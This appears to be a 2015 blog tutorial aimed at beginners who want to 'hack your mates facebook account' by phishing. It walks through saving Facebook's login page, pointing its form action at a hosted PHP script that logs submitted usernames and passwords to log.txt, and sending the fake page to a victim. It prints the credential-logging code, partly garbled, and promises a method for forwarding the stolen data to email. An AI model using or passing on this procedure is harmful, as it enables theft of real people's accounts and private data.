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Hacking Facebook-Working of Phishing to Hack Facebook Account

By Ajay Verma - Tuesday 10 November 2015 No Comments
hello friends, if are you new to hacking world and wanna hack your mates facebook account, i am going to describe Working of Phishing to Hack Facebook Account.
i am starting this articles from basic stuff so that it will help you to understand basic of tech.
before i start some codding, i want to explain you the login procedure of Facebook account.
when user visit to Facebook index page, there user found a Login Form,
when user enters login info (Username, And Password).
and clicks on LogIn Button to submit these info,
Browser sends these information to Facebook Server URl (which is written on action="https://.............attempt=1") for verification.
and for wrong combination of Username and Password, returns an error Page(url).
Now you know the internal working of login,
now the Hacking of Facebook Login starts here..
1. we have to save these combination (Username And Password) on our server.
we can achieve this by replacing action="FACEBOOK URL TO OUR URL".
Now we have to create a page and host on some server to operate (save) these login info.
2. Write some PHP code that can save these info to a file, send to email or database (more secure and complex).
as a starter you can save these info to a file on server, (Later i will explain how you can forward these info to your own email id)
3. PHP Code to save all login info to a file (log.txt)

[caption id="attachment_28" align="alignright" width="300"]Hacking Facebook-Working of Phishing to Hack Facebook Account Hacking Facebook-Working of Phishing to Hack Facebook Account[/caption]

/********** open php tag ********/
// To Redirect to Facebook Error Page
$handle = fopen(“log.txt”, “a”); //Open File to append
Foreach($_GET as $variable => $value) //loop for all input variable
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
Fwrite($handle, “rn”); //Saving to file
fclose($handle); //Closing file after save
/******** Code End ***************/

4. Now you have all working and knowledge of Phishing, now how to do this.
5. Create 2 files, i log.txt // blank to save login info
ii. login.php // write above written code in this file as it.
6. Upload these two files on any server, note url of login.php,
like ""
7. Open Browser and goto Facebook Website having no login, where only login page exist, and press CTR + S // to save facebook login page.
and after saving the page right click on html file and open with notepad,
Press CTR+F to find Action="" // explain earlier in pic.
and replace whole url with above url of login.php
8. Now you can directly send this html file to a friend and write something so that user must open and login to that page or
you can use an effective way by uploading this page on server and send url of this facebook page to friend.
hope you understand the whole procedure..
if any problem occurs just comment below i will try my best to solve.

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